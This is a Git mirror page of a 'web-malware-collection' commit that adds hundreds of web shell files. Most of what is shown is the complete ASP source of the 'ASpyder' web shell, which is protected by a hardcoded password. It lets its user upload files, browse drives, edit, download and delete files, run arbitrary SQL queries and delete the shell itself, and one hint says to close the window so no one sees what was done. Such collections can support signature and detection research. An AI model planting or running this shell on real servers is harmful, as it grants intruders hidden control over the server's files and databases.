Mirrors/webshell
2
0
Fork 0
mirror of https://github.com/tennc/webshell synced 2024-11-21 18:53:03 +00:00
Code Issues Projects Releases Packages Wiki Activity

web-malware-collection

Browse source
This commit is contained in:
tennc 2013-06-05 12:08:30 +08:00
parent f06456a918
commit 9258cfc622
243 changed files with 282639 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

1102
web-malware-collection-13-06-2012/ASP/3fexe.txt Normal file
View file

File diff suppressed because it is too large Load diff

827
web-malware-collection-13-06-2012/ASP/ASpy.txt Normal file
View file

@ -0,0 +1,827 @@
<%
Function BufferContent(data)
Dim strContent(64)
Dim i
ClearString strContent
For i = 1 To LenB(data)
AddString strContent,Chr(AscB(MidB(data,i,1)))
Next
BufferContent = fnReadString(strContent)
End Function
Sub ClearString(part)
Dim index
For index = 0 to 64
part(index)=""
Next
End Sub
Sub AddString(part,newString)
Dim tmp
Dim index
part(0) = part(0) & newString
If Len(part(0)) > 64 Then
index=0
tmp=""
Do
tmp=part(index) & tmp
part(index) = ""
index = index + 1
Loop until part(index) = ""
part(index) = tmp
End If
End Sub
Function fnReadString(part)
Dim tmp
Dim index
tmp = ""
For index = 0 to 64
If part(index) <> "" Then
tmp = part(index) & tmp
End If
Next
FnReadString = tmp
End Function
Class FileUploader
Public Files
Private mcolFormElem
Private Sub Class_Initialize()
Set Files = Server.CreateObject("Scripting.Dictionary")
Set mcolFormElem = Server.CreateObject("Scripting.Dictionary")
End Sub
Private Sub Class_Terminate()
If IsObject(Files) Then
Files.RemoveAll()
Set Files = Nothing
End If
If IsObject(mcolFormElem) Then
mcolFormElem.RemoveAll()
Set mcolFormElem = Nothing
End If
End Sub
Public Property Get Form(sIndex)
Form = ""
If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
End Property
Public Default Sub Upload()
Dim biData, sInputName
Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos
Dim nPosFile, nPosBound
biData = Request.BinaryRead(Request.TotalBytes)
nPosBegin = 1
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
If (nPosEnd-nPosBegin) <= 0 Then Exit Sub
vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
nDataBoundPos = InstrB(1, biData, vDataBounds)
Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--"))
nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition"))
nPos = InstrB(nPos, biData, CByteString("name="))
nPosBegin = nPos + 6
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename="))
nPosBound = InstrB(nPosEnd, biData, vDataBounds)
If nPosFile <> 0 And nPosFile < nPosBound Then
Dim oUploadFile, sFileName
Set oUploadFile = New UploadedFile
nPosBegin = nPosFile + 10
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev(sFileName, "\"))
nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:"))
nPosBegin = nPos + 14
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
nPosBegin = nPosEnd+4
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oUploadFile
Else
nPos = InstrB(nPos, biData, CByteString(Chr(13)))
nPosBegin = nPos + 4
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
End If
nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds)
Loop
End Sub
'String to byte string conversion
Private Function CByteString(sString)
Dim nIndex
For nIndex = 1 to Len(sString)
CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1)))
Next
End Function
'Byte string to string conversion
Private Function CWideString(bsString)
Dim nIndex
CWideString =""
For nIndex = 1 to LenB(bsString)
CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1)))
Next
End Function
End Class
Class UploadedFile
Public ContentType
Public FileName
Public FileData
Public Property Get FileSize()
FileSize = LenB(FileData)
End Property
Public Sub SaveToDisk(sPath)
Dim oFS, oFile
Dim nIndex
If sPath = "" Or FileName = "" Then Exit Sub
If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\"
Set oFS = Server.CreateObject("Scripting.FileSystemObject")
If Not oFS.FolderExists(sPath) Then Exit Sub
Set oFile = oFS.CreateTextFile(sPath & FileName, True)
' output mechanism modified for buffering
oFile.Write BufferContent(FileData)
oFile.Close
End Sub
Public Sub SaveToDatabase(ByRef oField)
If LenB(FileData) = 0 Then Exit Sub
If IsObject(oField) Then
oField.AppendChunk FileData
End If
End Sub
End Class
' Create the FileUploader
IF REQUEST.QueryString("upload")="@" THEN
Dim Uploader, File
Set Uploader = New FileUploader
' This starts the upload process
Uploader.Upload()
%>
<html><title>ASPYDrvsInfo</title>
<style>
<!--
A:link {font-style: text-decoration: none; color: #c8c8c8}
A:visited {font-style: text-decoration: none; color: #777777}
A:active {font-style: text-decoration: none; color: #ff8300}
A:hover {font-style: text-decoration: cursor: hand; color: #ff8300}
* {scrollbar-base-color:#777777;
scrollbar-track-color:#777777;scrollbar-darkshadow-color:#777777;scrollbar-face-color:#505050;
scrollbar-arrow-color:#ff8300;scrollbar-shadow-color:#303030;scrollbar-highlight-color:#303030;}
input,select,table {font-family:verdana,arial;font-size:11px;text-decoration:none;border:1px solid #000000;}
//-->
</style>
<body bgcolor=black text=white>
<BR><BR><BR>
<center><table bgcolor="#505050" cellpadding=4>
<tr><td><Font face=arial size=-1>File upload Information:</font>
</td></tr><tr><td bgcolor=black ><table>
<%
' Check if any files were uploaded
If Uploader.Files.Count = 0 Then
Response.Write "File(s) not uploaded."
Else
' Loop through the uploaded files
For Each File In Uploader.Files.Items
File.SaveToDisk Request.QueryString("txtpath")
Response.Write "<TR><TD>&nbsp;</TD></TR><tr><td><font color=gray>File Uploaded: </font></td><td>" & File.FileName & "</td></tr>"
Response.Write "<tr><td><font color=gray>Size: </font></td><td>" & Int(File.FileSize/1024)+1 & " kb</td></tr>"
Response.Write "<tr><td><font color=gray>Type: </font></td><td>" & File.ContentType & "</td></tr>"
Next
End If
%>
<TR><TD>&nbsp;</TD></TR></table>
</td></tr></table><BR><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=Request.QueryString("txtpath")%>"><font face="webdings" title=" BACK " size=+2 >7</font></a></center>
<%
response.End() '---- XXX
END IF
'--------
ON ERROR RESUME NEXT
Response.Buffer = True
password = "r00t" ' <---Your password here
If request.querystring("logoff")="@" then
session("shagman")="" ' Logged off
session("dbcon")="" ' Database Connection
session("txtpath")="" ' any pathinfo
end if
If (session("shagman")<>password) and Request.form("code")="" Then
%>
<body bgcolor=black><center><BR><BR><BR><BR><FONT face=arial size=-2 color=#ff8300>ADMINSTRATORS TOOLKIT</FONT><BR><BR><BR>
<table><tr><td>
<FORM method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" >
<table bgcolor=#505050 width="20%" cellpadding=20 ><tr><td bgcolor=#303030 align=center >
<INPUT type=password name=code ></td><td><INPUT name=submit type=submit value=" Access ">
</td></tr></table>
</td></tr><tr><td align=right>
<font color=white size=-2 face=arial >ASPSpyder Apr2003</font></td></tr>
</td></tr></table></FORM>
<%If request.querystring("logoff")="@" then%>
<font color=gray size=-2 face=arial title="To avoid anyone from seeing what you were doing by using the browser back button."><span style='cursor: hand;' OnClick=window.close(this);>CLOSE THIS WINDOW</font>
<%end if%>
<center>
<%
Response.END
End If
If Request.form("code") = password or session("shagman") = password Then
session("shagman") = password
Else
Response.Write "<BR><B><P align=center><font color=red ><b>ACCESS DENIED</B></font><BR><font color=Gray >Copyright 2003 Vela iNC.</font></p>"
Response.END
End If
server.scriptTimeout=180
set fso = Server.CreateObject("Scripting.FileSystemObject")
mapPath = Server.mappath(Request.Servervariables("SCRIPT_NAME"))
mapPathLen = len(mapPath)
if session(myScriptName) = "" then
for x = mapPathLen to 0 step -1
myScriptName = mid(mapPath,x)
if instr(1,myScriptName,"\")>0 then
myScriptName = mid(mapPath,x+1)
x=0
session(myScriptName) = myScriptName
end if
next
Else
myScriptName = session(myScriptName)
end if
wwwRoot = left(mapPath, mapPathLen - len(myScriptName))
Target = "D:\hshome\masterhr\masterhr.com\" ' ---Directory to which files will be DUMPED Too and From
if len(Request.querystring("txtpath"))=3 then
pathname = left(Request.querystring("txtpath"),2) & "\" & Request.form("Fname")
else
pathname = Request.querystring("txtpath") & "\" & Request.form("Fname")
end if
If Request.Form("txtpath") = "" Then
MyPath = Request.QueryString("txtpath")
Else
MyPath = Request.Form("txtpath")
End If
' ---Path correction routine
If len(MyPath)=1 then MyPath=MyPath & ":\"
If len(MyPath)=2 then MyPath=MyPath & "\"
If MyPath = "" Then MyPath = wwwRoot
If not fso.FolderExists(MyPath) then
Response.Write "<font face=arial size=+2>Non-existing path specified.<BR>Please use browser back button to continue !"
Response.end
end if
set folder = fso.GetFolder(MyPath)
if fso.GetFolder(Target) = false then
Response.Write "<font face=arial size=-2 color=red>Please create your target directory for copying files as it does not exist. </font><font face=arial size=-1 color=red>" & Target & "<BR></font>"
else
set fileCopy = fso.GetFolder(Target)
end if
If Not(folder.IsRootFolder) Then
If len(folder.ParentFolder)>3 then
showPath = folder.ParentFolder & "\" & folder.name
Else
showPath = folder.ParentFolder & folder.name
End If
Else
showPath = left(MyPath,2)
End If
MyPath=showPath
showPath=MyPath & "\"
' ---Path correction routine-DONE
set drv=fso.GetDrive(left(MyPath,2))
if Request.Form("cmd")="Download" then
if Request.Form("Fname")<>"" then
Response.Buffer = True
Response.Clear
strFileName = Request.QueryString("txtpath") & "\" & Request.Form("Fname")
Set Sys = Server.CreateObject( "Scripting.FileSystemObject" )
Set Bin = Sys.OpenTextFile( strFileName, 1, False )
Call Response.AddHeader( "Content-Disposition", "attachment; filename=" & Request.Form("Fname") )
Response.ContentType = "application/octet-stream"
While Not Bin.AtEndOfStream
Response.BinaryWrite( ChrB( Asc( Bin.Read( 1 ) ) ) )
Wend
Bin.Close : Set Bin = Nothing
Set Sys = Nothing
Else
err.number=500
err.description="Nothing selected for download..."
End if
End if
%>
<html>
<style>
<!--
A:link {font-style: text-decoration: none; color: #c8c8c8}
A:visited {font-style: text-decoration: none; color: #777777}
A:active {font-style: text-decoration: none; color: #ff8300}
A:hover {font-style: text-decoration: cursor: hand; color: #ff8300}
* {scrollbar-base-color:#777777;
scrollbar-track-color:#777777;scrollbar-darkshadow-color:#777777;scrollbar-face-color:#505050;
scrollbar-arrow-color:#ff8300;scrollbar-shadow-color:#303030;scrollbar-highlight-color:#303030;}
input,select,table {font-family:verdana,arial;font-size:11px;text-decoration:none;border:1px solid #000000;}
//-->
</style>
<%
'QUERY ANALYSER -- START
if request.QueryString("qa")="@" then
'-------------
sub getTable(mySQL)
if mySQL="" then
exit sub
end if
on error resume next
Response.Buffer = True
Dim myDBConnection, rs, myHtml,myConnectionString, myFields,myTitle,myFlag
myConnectionString=session("dbCon")
Set myDBConnection = Server.CreateObject("ADODB.Connection")
myDBConnection.Open myConnectionString
myFlag = False
myFlag = errChk()
set rs = Server.CreateObject("ADODB.Recordset")
rs.cursorlocation = 3
rs.open mySQL, myDBConnection
myFlag = errChk()
if RS.properties("Asynchronous Rowset Processing") = 16 then
For i = 0 To rs.Fields.Count - 1
myFields = myFields & "<TD><font color=#eeeeee size=2 face=""Verdana, Arial, Helvetica, sans-serif"">" & rs.Fields(i).Name & "</font></TD>"
Next
myTitle = "<font color=gray size=6 face=webdings>?</font><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray><TT>(" & rs.RecordCount & " row(s) affected)</TT><br>"
rs.MoveFirst
rs.PageSize=mNR
if int(rs.RecordCount/mNR) < mPage then mPage=1
rs.AbsolutePage = mPage
Response.Write myTitle & "</td><td>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"
if mPage=1 Then Response.Write("<input type=button name=btnPagePrev value="" << "" DISABLED>") else Response.Write("<input type=button name=btnPagePrev value="" << "">")
Response.Write "<select name=cmbPageSelect>"
For x = 1 to rs.PageCount
if x=mPage Then Response.Write("<option value=" & x & " SELECTED>" & x & "</option>") else Response.Write("<option value=" & x & ">" & x & "</option>")
Next
Response.Write "</select><input type=hidden name=mPage value=" & mPage & ">"
if mPage = rs.PageCount Then Response.Write("<input type=button name=btnPageNext value="" >> "" DISABLED>") else Response.Write("<input type=button name=btnPageNext value="" >> "">")
Response.Write "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray>Displaying <input type=text size=" & Len(mNR) & " name=txtNoRecords value=" & mNR & "> records at a time.</font>"
response.Write "</td><TABLE border=0 bgcolor=#999999 cellpadding=2><TR align=center valign=middle bgcolor=#777777>" & myFields
For x = 1 to rs.PageSize
If Not rs.EOF Then
response.Write "<TR>"
For i = 0 to rs.Fields.Count - 1
response.Write "<TD bgcolor=#dddddd>" & server.HTMLEncode(rs(i)) & "</TD>"
Next
response.Write "</TR>"
response.Flush()
rs.MoveNext
Else
x=rs.PageSize
End If
Next
response.Write "</Table>"
myFlag = errChk()
else
if not myFlag then
myTitle = "<font color=#55ff55 size=6 face=webdings>i</font><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray><TT>(The command(s) completed successfully.)</TT><br>"
response.Write myTitle
end if
end if
set myDBConnection = nothing
set rs2 = nothing
set rs = nothing
End sub
sub getXML(mySQL)
if mySQL="" then
exit sub
end if
on error resume next
Response.Buffer = True
Dim myDBConnection, rs, myHtml,myConnectionString, myFields,myTitle,myFlag
myConnectionString=session("dbCon")
Set myDBConnection = Server.CreateObject("ADODB.Connection")
myDBConnection.Open myConnectionString
myFlag = False
myFlag = errChk()
set rs = Server.CreateObject("ADODB.Recordset")
rs.cursorlocation = 3
rs.open mySQL, myDBConnection
myFlag = errChk()
if RS.properties("Asynchronous Rowset Processing") = 16 then
Response.Write "<font color=#55ff55 size=4 face=webdings>i</font><font color=#cccccc> Copy paste this code and save as '.xml '</font></td></tr><tr><td>"
Response.Write "<textarea cols=75 name=txtXML rows=15>"
rs.MoveFirst
response.Write vbcrlf & "<?xml version=""1.0"" ?>"
response.Write vbcrlf & "<TableXML>"
Do While Not rs.EOF
response.Write vbcrlf & "<Column>"
For i = 0 to rs.Fields.Count - 1
response.Write vbcrlf & "<" & rs.Fields(i).Name & ">" & rs(i) & "</" & rs.Fields(i).Name & ">" & vbcrlf
response.Flush()
Next
response.Write "</Column>"
rs.MoveNext
Loop
response.Write "</TableXML>"
response.Write "</textarea>"
myFlag = errChk()
else
if not myFlag then
myTitle = "<font color=#55ff55 size=6 face=webdings>i</font><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray><TT>(The command(s) completed successfully.)</TT><br>"
response.Write myTitle
end if
end if
End sub
Function errChk()
if err.Number <> 0 and err.Number <> 13 then
dim myText
myText = "<font color=#ff8300 size=4 face=webdings>x</font><font color=red size=2 face=""Verdana, Arial, Helvetica, sans-serif""> " & err.Description & "</font><BR>"
response.Write myText
err.Number = 0
errChk = True
end if
end Function
Dim myQuery,mPage,mNR
myQuery = request.Form("txtSQL")
if request.form("txtCon") <> "" then session("dbcon") = request.form("txtCon")
if request.QueryString("txtpath") then session("txtpath")=request.QueryString("txtpath")
mPage=cint(request.Form("mPage"))
if mPage<1 then mPage=1
mNR=cint(request.Form("txtNoRecords"))
if mNR<1 then mNR=30
%>
<html><title>ASPyQAnalyser</title>
<script language="VbScript">
sub cmdSubmit_onclick
if Document.frmSQL.txtSQL.value = "" then
Document.frmSQL.txtSQL.value = "SELECT * FROM " & vbcrlf & "WHERE " & vbcrlf & "ORDER BY "
exit sub
end if
Document.frmSQL.Submit
end sub
sub cmdTables_onclick
Document.frmSQL.txtSQL.value = "select name as 'TablesListed' from sysobjects where xtype='U' order by name"
Document.frmSQL.Submit
end sub
sub cmdColumns_onclick
strTable =InputBox("Return Columns for which Table?","Table Name...")
strTable = Trim(strTable)
if len(strTable) > 0 Then
SQL = "select name As 'ColumnName',xusertype As 'DataType',length as Length from syscolumns where id=(select id from sysobjects where xtype='U' and name='" & strTable & "') order by name"
Document.frmSQL.txtSQL.value = SQL
Document.frmSQL.Submit
End if
end sub
sub cmdClear_onclick
Document.frmSQL.txtSQL.value = ""
end sub
sub cmdBack_onclick
Document.Location = "<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=session("txtpath")%>"
end sub
Sub btnPagePrev_OnClick
Document.frmSQL.mPage.value = Document.frmSQL.mPage.value - 1
Document.frmSQL.Submit
end sub
Sub btnPageNext_OnClick
Document.frmSQL.mPage.value = Document.frmSQL.mPage.value + 1
Document.frmSQL.Submit
end sub
Sub cmbPageSelect_onchange
Document.frmSQL.mPage.value = (Document.frmSQL.cmbPageSelect.selectedIndex + 1)
Document.frmSQL.Submit
End Sub
Sub txtNoRecords_onclick
Document.frmSQL.cmbPageSelect.selectedIndex = 0
Document.frmSQL.mPage.value = 1
End Sub
</script>
<style>
TR {font-family: sans-serif;}
</style>
<body bgcolor=black>
<form name=frmSQL action="<%=Request.Servervariables("SCRIPT_NAME")%>?qa=@" method=Post>
<table border="0"><tr>
<td align=right><font color=#ff8300 size="4" face="webdings">@ </font><font color="#CCCCCC" size="1" face="Verdana, Arial, Helvetica, sans-serif">Paste
your connection string here : </font><font color="#CCCCCC">
<input name=txtCon type="text" size="60" value="<%=session("dbcon")%>">
</font><BR>
<textarea cols=75 name=txtSQL rows=4 wrap=PHYSICAL><%=myQuery%></textarea><BR>
<input name=cmdSubmit type=button value=Submit><input name=cmdTables type=button value=Tables><input name=cmdColumns type=button value=Columns><input name="reset" type=reset value=Reset><input name=cmdClear type=button value=Clear><input name=cmdBack type=button value="Return"><input type="Checkbox" name="chkXML" <%IF Request.Form("chkXML")= "on" tHEN Response.Write " checked " %>><font color="#CCCCCC" size="1" face="Verdana, Arial, Helvetica, sans-serif">GenerateXML</FONT>
</td>
<td>XXXXXX</td><td>
<center><B>ASP</b><font color=#ff8300 face=webdings size=6 >!</font><B><font color=Gray >Spyder</font> Apr2003</B><BR><font color=black size=-2><TT>by ~sir_shagalot</TT></font></center>
</td></tr></table>
<table><tr><td><%If Request.Form("chkXML") = "on" Then getXML(myQuery) Else getTable(myQuery) %></td></tr></table></form>
<HR><P align=right><font color=#ff8300><TT>Copyright 2003 Vela iNC.</B></font><BR><font size=-1 color=gray>Cheers to <a href="mailto:hAshish@shagzzz.cjb.net">hAshish</a> for all the help!</font></p><BR>
</body>
</html>
<%
set myDBConnection = nothing
set rs2 = nothing
set rs = nothing
'-------------
response.End()
end if
'QUERY ANALYSER -- STOP
%>
<title><%=MyPath%></title>
</head>
<body bgcolor=black text=white topAprgin="0">
<!-- Copyright Vela iNC. Apr2003 [www.shagzzz.cjb.net] Coded by ~sir_shagalot -->
<%
Response.Flush
'Code Optimisation START
select case request.form("cmd")
case ""
If request.form("dirStuff")<>"" then
Response.write "<font face=arial size=-2>You need to click [Create] or [Delete] for folder operations to be</font>"
Else
Response.Write "<font face=webdings size=+3 color=#ff8300>&#1570;</font>"
End If
case " Copy "
' ---Copy From Folder routine Start
If Request.Form("Fname")="" then
Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.QueryString("txtpath") & "\???</font><BR>"
err.number=424
Else
Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.QueryString("txtpath") & "\" & Request.Form("Fname") & "</font><BR>"
fso.CopyFile Request.QueryString("txtpath") & "\" & Request.Form("Fname"),Target & Request.Form("Fname")
Response.Flush
End If
' ---Copy From Folder routine Stop
case " Copy "
' ---Copy Too Folder routine Start
If Request.Form("ToCopy")<>"" and Request.Form("ToCopy") <> "------------------------------" Then
Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.Form("txtpath") & "\" & Request.Form("ToCopy") & "</font><BR>"
Response.Flush
fso.CopyFile Target & Request.Form("ToCopy"), Request.Form("txtpath") & "\" & Request.Form("ToCopy")
Else
Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.Form("txtpath") & "\???</font><BR>"
err.number=424
End If
' ---Copy Too Folder routine Stop
case "Delete" 'two of this
if request.form("todelete")<>"" then
' ---File Delete start
If (Request.Form("ToDelete")) = myScriptName then'(Right(Request.Servervariables("SCRIPT_NAME"),len(Request.Servervariables("SCRIPT_NAME"))-1)) Then
Response.Write "<center><font face=arial size=-2 color=#ff8300><BR><BR><HR>SELFDESTRUCT INITIATED...<BR>"
Response.Flush
fso.DeleteFile Request.Form("txtpath") & "\" & Request.Form("ToDelete")
%>+++DONE+++</font><BR><HR>
<font color=gray size=-2 face=arial title="To avoid anyone from seeing what you were doing by using the browser back button."><span style='cursor: hand;' OnClick=window.close(this);>CLOSE THIS WINDOW</font>
<%Response.End
End If
If Request.Form("ToDelete") <> "" and Request.Form("ToDelete") <> "------------------------------" Then
Response.Write "<font face=arial size=-2 color=#ff8300>Deleting: " & Request.Form("txtpath") & "\" & Request.Form("ToDelete") & "</font><BR>"
Response.Flush
fso.DeleteFile Request.Form("txtpath") & "\" & Request.Form("ToDelete")
Else
Response.Write "<font face=arial size=-2 color=#ff8300>Deleting: " & Request.Form("txtpath") & "\???</font><BR>"
err.number=424
End If
' ---File Delete stop
Else If request.form("dirStuff")<>"" then
Response.Write "<font face=arial size=-2 color=#ff8300>Deleting folder...</font><BR>"
fso.DeleteFolder MyPath & "\" & request.form("DirName")
end if
End If
case "Edit/Create"
%>
<center><BR><table bgcolor="#505050" cellpadding="8"><tr>
<td bgcolor="#000000" valign="bottom">
<Font face=arial SIZE=-2 color=#ff8300>NOTE: The following edit box maynot display special characters from files. Therefore the contents displayed maynot be considered correct or accurate.</font>
</td></tr><tr><td><TT>Path=> <%=pathname%><BR><BR>
<%
' fetch file information
Set f = fso.GetFile(pathname)
%>
file Type: <%=f.Type%><BR>
file Size: <%=FormatNumber(f.size,0)%> bytes<BR>
file Created: <%=FormatDateTime(f.datecreated,1)%>&nbsp;<%=FormatDateTime(f.datecreated,3)%><BR>
last Modified: <%=FormatDateTime(f.datelastmodified,1)%>&nbsp;<%=FormatDateTime(f.datelastmodified,3)%><BR>
last Accessed: <%=FormatDateTime(f.datelastaccessed,1)%>&nbsp;<%=FormatDateTime(f.datelastaccessed,3)%><BR>
file Attributes: <%=f.attributes%><BR>
<%
Set f = Nothing
response.write "<center><FORM action=""" & Request.Servervariables("SCRIPT_NAME") & "?txtpath=" & MyPath & """ METHOD=""POST"">"
'read the file
Set f = fso.OpenTextFile(pathname)
If NOT f.AtEndOfStream Then fstr = f.readall
f.Close
Set f = Nothing
Set fso = Nothing
response.write "<TABLE><TR><TD>" & VBCRLF
response.write "<FONT TITLE=""Use this text area to view or change the contents of this document. Click [Save As] to store the updated contents to the web server."" FACE=arial SIZE=1 ><B>DOCUMENT CONTENTS</B></FONT><BR>" & VBCRLF
response.write "<TEXTAREA NAME=FILEDATA ROWS=16 COLS=85 WRAP=OFF>" & Server.HTMLEncode(fstr) & "</TEXTAREA>" & VBCRLF
response.write "</TD></TR></TABLE>" & VBCRLF
%>
<BR><center><TT>LOCATION <INPUT TYPE="TEXT" SIZE=48 MAXLENGTH=255 NAME="PATHNAME" VALUE="<%=pathname%>">
<INPUT TYPE="SUBMIT" NAME=cmd VALUE="Save As" TITLE="This write to the file specifed and overwrite it without warning.">
<INPUT TYPE="SUBMIT" NAME="POSTACTION" VALUE="Cancel" TITLE="If you recieve an error while saving, then most likely you do not have write access OR the file attributes are set to readonly !!">
</FORM></td></tr></table><BR>
<%
response.end
case "Create"
Response.Write "<font face=arial size=-2 color=#ff8300>Creating folder...</font><BR>"
fso.CreateFolder MyPath & "\" & request.form("DirName")
case "Save As"
Response.Write "<font face=arial size=-2 color=#ff8300>Saving file...</font><BR>"
Set f = fso.CreateTextFile(Request.Form("pathname"))
f.write Request.Form("FILEDATA")
f.close
end select
'Code Optimisation STOP
' ---DRIVES start here
If request.querystring("getDRVs")="@" then
%>
<BR><BR><BR><center><table bgcolor="#505050" cellpadding=4>
<tr><td><Font face=arial size=-1>Available Drive Information:</font>
</td></tr><tr><td bgcolor=black >
<table><tr><td><tt>Drive</td><td><tt>Type</td><td><tt>Path</td><td><tt>ShareName</td><td><tt>Size[MB]</td><td><tt>ReadyToUse</td><td><tt>VolumeLabel</td><td></tr>
<%For Each thingy in fso.Drives%>
<tr><td><tt>
<%=thingy.DriveLetter%> </td><td><tt> <%=thingy.DriveType%> </td><td><tt> <%=thingy.Path%> </td><td><tt> <%=thingy.ShareName%> </td><td><tt> <%=((thingy.TotalSize)/1024000)%> </td><td><tt> <%=thingy.IsReady%> </td><td><tt> <%=thingy.VolumeName%>
<%Next%>
</td></tr></table>
</td></tr></table><BR><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=MyPath%>"><font face="webdings" title=" BACK " size=+2 >7</font></a></center>
<%
Response.end
end if
' ---DRIVES stop here
%>
<HEAD>
<SCRIPT Language="VBScript">
sub getit(thestuff)
if right("<%=showPath%>",1) <> "\" Then
document.myform.txtpath.value = "<%=showPath%>" & "\" & thestuff
Else
document.myform.txtpath.value = "<%=showPath%>" & thestuff
End If
document.myform.submit()
End sub
</SCRIPT>
</HEAD>
<%
'---Report errors
select case err.number
case "0"
response.write "<font face=webdings color=#55ff55>i</font> <font face=arial size=-2>Successfull..</font>"
case "58"
response.write "<font face=arial size=-1 color=red>Folder already exists OR no folder name specified...</font>"
case "70"
response.write "<font face=arial size=-1 color=red>Permission Denied, folder/file is readonly or contains such files...</font>"
case "76"
response.write "<font face=arial size=-1 color=red>Path not found...</font>"
case "424"
response.write "<font face=arial size=-1 color=red>Missing, Insufficient data OR file is readonly...</font>"
case else
response.write "<font face=arial size=-1 color=red>" & err.description & "</font>"
end select
'---Report errors end
%>
<center><B>ASP</b><font color=#ff8300 face=webdings size=6 >!</font><B><font color=Gray >Spyder</font> Apr2003</B><BR><font color=black size=-2><TT>by ~sir_shagalot</TT></font></center>
<font face=Courier>
<table><tr><td>
<form method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" name="myform" >
<Table bgcolor=#505050 ><tr><td bgcolor=#505050 >
<font face=Arial size=-2 color=#ff8300 > PATH INFO : </font></td><td align=right ><font face=Arial size=-2 color=#ff8300 >Volume Label:</font> <%=drv.VolumeName%> </td></tr>
<tr><td colspan=2 cellpadding=2 bgcolor=#303030 ><font face=Arial size=-1 color=gray>Virtual: http://<%=Request.ServerVariables("SERVER_NAME")%><%=Request.Servervariables("SCRIPT_NAME")%></Font><BR><font face=wingdings color=Gray >1</font><font face=Arial size=+1 > <%=showPath%></Font>
<BR><input type=text width=40 size=60 name=txtpath value="<%=showPath%>" ><input type=submit name=cmd value=" View " >
</td></tr></form></table>
</td><td><center>
<table bgcolor=#505050 cellpadding=4><tr><td bgcolor=black ><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?getDRVs=@&txtpath=<%=MyPath%>"><font size=-2 face=arial>Retrieve Available Network Drives</a></td></tr>
<tr><td bgcolor=black align=right><A HREF="<%=Request.Servervariables("SCRIPT_NAME")%>?qa=@&txtpath=<%=MyPath%>"><font size=-2 face=arial>SQL Query Analyser</A></td></tr>
<tr><td bgcolor=black align=right><A HREF="<%=Request.Servervariables("SCRIPT_NAME")%>?logoff=@&...thankyou.for.using.ASpyder....~sir_shagalot!..[shagzzz.cjb.net]"><font size=-2 face=arial>+++LOGOFF+++</A></td></tr></table>
</td></tr></table>
<p align=center ><Table width=75% bgcolor=#505050 cellpadding=4 ><tr><td>
<form method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" ><font face=arial size=-1 >Delete file from current directory:</font><BR>
<select size=1 name=ToDelete >
<option>------------------------------</option>"
<%
fi=0
For each file in folder.Files
Response.Write "<option>" & file.name & "</option>"
fi=fi+1
next
Response.Write "</select><input type=hidden name=txtpath value=""" & MyPath & """><input type=Submit name=cmd value=Delete ></form></td><td>"
Response.Write "<form method=post name=frmCopyFile action=""" & Request.Servervariables("SCRIPT_NAME") & """ ><font face=arial size=-1 >Copy file too current directory:</font><br><select size=1 name=ToCopy >"
Response.Write "<option>------------------------------</option>"
For each file in fileCopy.Files
Response.Write "<option>" & file.name & "</option>"
next
Response.Write "</select><input type=hidden name=txtpath value=""" & MyPath & """><input type=Submit name=cmd value="" Copy "" ></form></td></tr></Table>"
Response.Flush
' ---View Tree Begins Here
Response.Write "<table Cellpading=2 width=75% bgcolor=#505050 ><tr><td valign=top width=50% bgcolor=#303030 >Folders:<BR><BR>"
fo=0
Response.Write "<font face=wingdings color=Gray >0</font> <FONT COLOR=#c8c8c8><span style='cursor: hand;' OnClick=""getit('..')"">..</span></FONT><BR>"
For each fold in folder.SubFolders '-->FOLDERz
fo=fo+1
